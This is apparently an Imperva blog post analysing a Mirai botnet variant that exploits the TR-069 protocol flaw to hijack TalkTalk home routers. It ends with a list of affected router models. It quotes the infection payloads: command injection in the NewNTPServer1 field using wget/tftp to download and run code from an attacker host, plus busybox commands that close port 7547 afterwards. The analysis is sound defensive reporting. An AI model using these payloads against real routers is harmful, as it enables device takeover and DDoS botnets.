WP New Variant of Mirai Embeds Itself in TalkTalk Home Routers | Imperva

New Variant of Mirai Embeds Itself in TalkTalk Home Routers

New Variant of Mirai Embeds Itself in TalkTalk Home Routers

It’s been over two months since Mirai source code was leaked on the HackForum, placing it into the hands of botnet herders around the world. What followed was a stream of reports about high-profile Mirai-powered DDoS attacks—including the takedown of Dyn DNS services. That one brought down many of the world’s most popular websites and services—Netflix, Twitter and Reddit among many.

Most recently, Mirai caused the mass shutdown of Deutsche Telekom routers, reportedly affecting over 900,000 DT customers. Having evolved from the original malware, here a Mirai variant was used to exploit a newly discovered TR-069 protocol vulnerability (EDB-ID:40740) to hijack network routers.

Following the assault, DT issued an emergency patch that hopefully solved the issue for the majority of its customers. Just a few days later, however, we found ourselves face-to-face with a similar router-based Mirai botnet, this time operating out of UK.

The record of this attack underlines the fact that the new TR-069 vulnerability, and the malware variants that exploit it, pose threat to customers of ISPs around the world.

Mirai and the TR-069 Vulnerability

TR-069 (a.k.a., CPE WAN Management Protocol, or CWMP) is a widely used protocol many ISPs employ to remotely manage network routers. Its communication occurs on port 7547, to which remote commands are sent. One such command is Time/SetNTPServers, used to synchronize a router with an external time source.

However, this same command can also be modified to let hackers remotely execute bash commands. Among other things, this enables them to:

  • Open port 80 for remote access.
  • Obtain Wi-Fi passwords.
  • Modify the iptable rules.
  • Inject malware into the device.

A few weeks after the tr-069 vulnerability was made public, cyber journalists at BadCyber documented an even newer Mirai variant that was downloading itself into routers using wget and tftp commands.

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh
<NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1>
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
Source: BadCyber

Like the legacy Mirai malware, this variant is also programmed to “close the door” after injecting itself into a device. To do so, it runs the following command, making port 7547 unavailable until the next reboot.

busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
busybox killall -9 telnetd
Source: BadCyber

At that time of the discovery, over five million devices made their TR-069 interface available to the outside world. Serendipitously, the study was published the same day DT routers started to go down.

Meanwhile in the UK…

As DT was recovering from its Mirai encounter, on December 5th a UK-based bitcoin company website using the Incapsula service was hit with a slew of GET and POST flood attacks. These continue at this moment.

Figure 1: HTTP flood, peaking at 8,674 RPS

The attack peaked at over 8,600 RPS (requests per second). It then scaled back to a steady flow of 200 –1000 RPS, directed toward two specific pages on our client’s website.

The offenders’ persistence, as well as its choice of targets, shows this to be a premeditated offensive—not the typical random burst launched from a rented DDoS-for-hire service.

Figure 2: One of the attacking bots, running on BusyBox

The assault was executed by DDoS bots running on BusyBox, using “Anus” as their user-agent of choice. We’re unsure why the attackers chose this specific moniker, but some stones are better left unturned.

Infinitely more interesting was the botnet devices’ geolocation. As seen in the image below, all of the 2,398 attacking IPs were located in the UK.

Figure 3: Geolocations of the botnet devices

This kind of IP distribution is uncommon for DDoS botnets. Typically it indicates a vulnerability in a device supplied by local retailers, which allows for such a regional botnet to appear.

In this case, a quick scan revealed a horde of malware-infected home routers, over 99 percent of which belonged to the TalkTalk Telecom network. So we had our device and our distributor.

But a question remained: How were these routers compromised?

We almost ruled out TR-069, as none of the random IP scans found any devices with an open 7547 port. However, when we fed the same addresses into Shodan, we discovered that these ports had been open until a few days ago.

This provided us not only with the smoking gun, but also with the possible identify of the culprit. Returning to the MO described in BadCyber’s post, this was a sign of the same Mirai variant nesting itself in the device and then shutting the door behind itself.

Figure 4: Shodan’s cache shows the port open on November 30

Figure 5: Our scan shows the port closed on December 6

ISPs’s Responsibilities

Without full access to the infected routers, it’s difficult to know with certainty whether the malware used to execute this attack was the same Mirai variant used against Deutsche Telekom or the one encountered by the BadCyber researchers.

That said, every minor source code modification breeds a new Mirai “mutation,” making these nuances almost beside the point. What’s important to note is that these attacks are enabled by the same vulnerability in ISP distributed routers.

We hope that the accumulated reports of the attacks will serve as a wakeup call for ISPs using routers susceptible to the vulnerability in the TR-069 protocol.

With variants of Mirai already leveraging the exploit for large-scale attacks, it’s time for ISPs to proactively assume responsibility and issue emergency patches. Doing so will not only protect the privacy of their customers but also prevent their routers from falling into the hands of botnet operators, who would use them to endanger the internet ecosystem.

Not long after this story was written, TalkTalk became aware of the situation and issued a fix for the vulnerability that closes the TR-069 interface and resets the router.

In the following days we saw the number of attacking IPs decrease until only 259 devices were participating in the attack.

We encourage other ISPs to follow suit.

Impacted Vendors
(this list is probably not complete)
Impacted Devices
Arcadyan ADSL Router
Aztech DSL5001
Aztech DSL5005
Aztech DSL5008
Aztech DSL5018EN
Aztech DSL5068EN(1T1R)
Aztech RAW300-USB
Aztech Technologies Pte. Ltd. 700WR
Aztech Technologies Pte. Ltd. DSL5028EN(1T1R)
Aztech Technologies Pte. Ltd. DSL5028EN(2T2R)
Aztech Technologies Pte. Ltd. RAW300L-A05
BEC 6300NEL R10
BEC 6300VNL R4
BEC 6300VNL R5
BEC 6300VNL R6
BEC 9800VN
Billion BiPAC 4500VNOZ
Billion BiPAC 6300NX
Billion BiPAC 6300NXL
Billion BiPAC 6801VNL
Billion BiPAC 7300WR2
Billion BiPAC 8300NL
Billion BiPAC 8400NLR2
Billion BiPAC 8400NL-T R2
Binatone Binatone Router Adsl Router
Binatone DT820
Binatone DT 820
Binatone DT845W
Binatone DT850W
Binatone DT850W DSL Gateway
Binatone DT850W(HFCL)
Binatone DT860W
BiPAC 8300NL
Comtrend VR-3041u
Digicom RAW150-A02
Digicom RAW150-A03
Digicom RAW300-A01
Digicom RAW300U-A02
D-Link DSL-2875AL
D-Link DSL-2877AL
D-Link DSL-3780
D-Link DSL-3782
D-Link DSL-3882
DT Speedport Entry SPW505V
Gateway Prestige 660HNU-T1
iBall iB-WRA150N DSL-Gateway
ITI Ltd. DNA-1051
ITI Ltd. DNA-2012
ITI Ltd. DNA-2013
MitraStar DSL-100HN-T1-GV
MitraStar DSL-100HN-T1-NV
MitraStar DSL-100HN-T1v4
MitraStar DSL-2401HN-T1C
MitraStar DSL-2401HN-T1C-GV
MitraStar DSL-2401HN-T1C-NV
MitraStar HGW-2501GNP-NV
Supernet DSLW200
Supernet DSLW200 ADSL2+W2
T-Com. Speedport W303V
T-Com. Speedport W303V DTW303VA
T-Com. Speedport W 303V Typ A DTW303VA
T-Com. Speedport W 502V Typ A DTW502A
T-Com. Speedport W 503V Typ C DTW503VA
T-Com. Speedport W700V DTW7V
T-Com. Speedport W720V DTW72V
T-Com. Speedport W722V DTW722V
Teracom TDSL300W2 ADSL2+W2
T-Home Speedport W 504V Typ A DTW504VA
T-Home Speedport W 723V Typ B DTW723VA
T-Home Speedport W 921V DTW921V
TP-LINK TD-W8951ND DSL-Gateway
Upvel LLC. 354AN4G
Upvel LLC. UR-314AN4G
Upvel LLC. UR-354AN4G
ZTE ZXV10 W300
ZyXEL AMG1001-T10A
ZyXEL AMG1201-T10A
ZyXEL AMG1202-T10A
ZyXEL AMG1202-T10B
ZyXEL AMG1302-T10A
ZyXEL AMG1302-T10B
ZyXEL AMG1302-T11B
ZyXEL AMG1302-T11C
ZyXEL AMG1312-T10B
ZyXEL DEL1201-T10A
ZyXEL DEL1202-T10B/B
ZyXEL DEL1202-T10B/W
ZyXEL DEL1312-T10B
ZyXEL eircom D1000 Modem P-660HNU-T1 v2
ZyXEL eir D1000 Modem P-660HNU-T1 v2
ZyXEL P-1202-T10B
ZyXEL P-1302-T10B
ZyXEL P-1302-T10D
ZyXEL P-1302-T10D v2
ZyXEL P-1302-T10D v3
ZyXEL P660HN Lite EE
ZyXEL P-660HN-T1A_IPv6
ZyXEL P-660HN-T1A v2
ZyXEL P-660HN-T1H_IPv6
ZyXEL P-660HN-T1_IPv6
ZyXEL P-660HN-T1 v2
ZyXEL P-660HN-T3A_IPv6
ZyXEL P-660HNU-T1_IPv6
ZyXEL P-660HNU-T1 Prestige 660HNU-T1
ZyXEL P-660HNU-T3_IPv6
ZyXEL P-660H-T1 Prestige 660H-T1
ZyXEL P-660H-T1v3s
ZyXEL P-660HU-T1 Prestige 660HU-T1
ZyXEL P-660N-T1A
ZyXEL P-660R-T1
ZyXEL P-660R-T1 v3
ZyXEL P-660R-T1v3s
ZyXEL P-660R-T1 v3s
ZyXEL P-660R-T3-v3s